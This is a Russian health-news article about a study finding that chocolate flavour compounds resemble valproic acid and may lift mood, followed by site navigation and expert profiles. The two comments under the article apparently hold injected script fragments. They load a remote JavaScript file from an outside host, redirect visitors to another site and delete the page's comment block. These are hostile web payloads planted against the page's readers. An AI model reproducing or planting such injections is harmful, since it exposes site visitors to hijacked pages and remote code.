Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шоколад улучшает настроен...  >>  Шоколад улучшает настроение! Теперь это факт
 
Обратная связь
 

Шоколад улучшает настроение! Теперь это факт

Размер шрифта
25 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что ароматизаторы, которые содержатся  в шоколаде, по своему строению напоминают вальпроевую кислоту.

шоколад

Что такое вальпроевая кислота

Вальпроевая кислота – это лекарственное средство, которое используется для лечения эпилепсии. Она оказывает противосудорожное, центральное миорелаксирующее и седативное действие, улучшает психическое состояние и настроение больных. Вальпроевая кислота повышает содержание в центральной нервной системе гамма-аминомасляной кислоты, что приводит к снижению порога возбудимости и уровня судорожной готовности моторных зон головного мозга.

Суть исследования

Известно, что химические вещества, которые содержатся в шоколаде, чернике, малине, клубнике, чае и некоторых других продуктах обладают замечательным эффектом: они улучшают настроение. В связи с этим ученые решили направить свои силы на поиски новых веществ, содержащихся в пищевых продуктах, которые позволят справиться с перепадами настроения, улучшить мышление, сохранить психическое здоровье и избежать потери памяти.

В ходе проведения исследования ученые изучили химическую структуру более 1 700 различных ароматизаторов на предмет их сходства с антидепрессантами и лекарственными препаратами, проявляющими свойства антидепрессантов.

Согласно данным исследования, некоторые ароматизаторы, которые содержатся в шоколаде, по своей структуре напоминают вальпроевую кислоту. 

Результаты

Хотя то, что шоколад поднимает настроение уже установленный факт, в дальнейшем ученые планируют проверить свою гипотезу экспериментально. Возможно, это позволит составить рекомендации по питанию или создать пищевые добавки, улучшающие настроение.

Однако следует помнить о том, что  никакие продукты питания не способны заменить антидепрессанты. Поэтому если врач прописал вам препараты, их следует принимать в обязательном порядке. Тем, кому антидепрессанты не требуются, для сохранения хорошего настроения достаточно вести здоровый образ жизни, правильно питаться и иногда есть шоколад.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В это невозможно поверить! Шоколад помогает похудеть!   Любовь спасет вас от смерти. Доказано учеными!   Ого! Чай с шоколадкой и ягодами спасет от диабета!   Горький шоколад полезен для сердца! Но все благодаря бактериям!  

Слайдшоу

1
Лучшая еда при менопаузе
Как есть, чтобы не было изжоги
Как контролировать свои соблазны и похудеть?

Тесты

Что вы знаете о депрессии?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.